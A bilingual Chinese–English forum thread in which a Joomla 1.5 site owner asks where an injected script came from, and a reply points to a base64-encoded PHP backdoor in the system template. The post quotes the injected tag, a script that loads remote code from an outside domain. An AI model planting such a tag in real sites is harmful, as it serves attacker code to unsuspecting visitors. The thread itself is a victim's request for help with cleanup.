乔姆拉! 1.5 网站成为 XSS 的受害者
我的乔姆拉! 1.5 网站最近成为了 XSS 攻击的受害者(对于这些东西我是个菜鸟)...以下代码被注入到该网站(某处),
<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script>
但我不确定具体在哪里。我搜索了数据库和文件,但只找到零个结果。我有什么明显遗漏的东西吗?
My Joomla! 1.5 website recently fell victim to what seems to be an XSS attack (I'm a noob when it comes to this stuff)...The following code was injected into the site (somewhere)
<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script>
and I'm not sure exactly where. I've searched the database as well as the files, only to find zero results. Is there something obvious I'm missing?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(1)
我的网站也成为了这次攻击的受害者,仍在调查中。这不是 XSS 攻击,您的服务器文件已被泄露。查看索引 php 文件中的系统模板,您会发现如下代码块:
Base64 编码字符串是执行各种令人讨厌的事情的 php 代码。
My site also fell victim to this attack, still investigating it. It is not a XSS attack, your server files were compromised. Look inside the system template in the index php file and you will find a block of code like this:
The base64 encode string is php code that does all sorts of nasty things.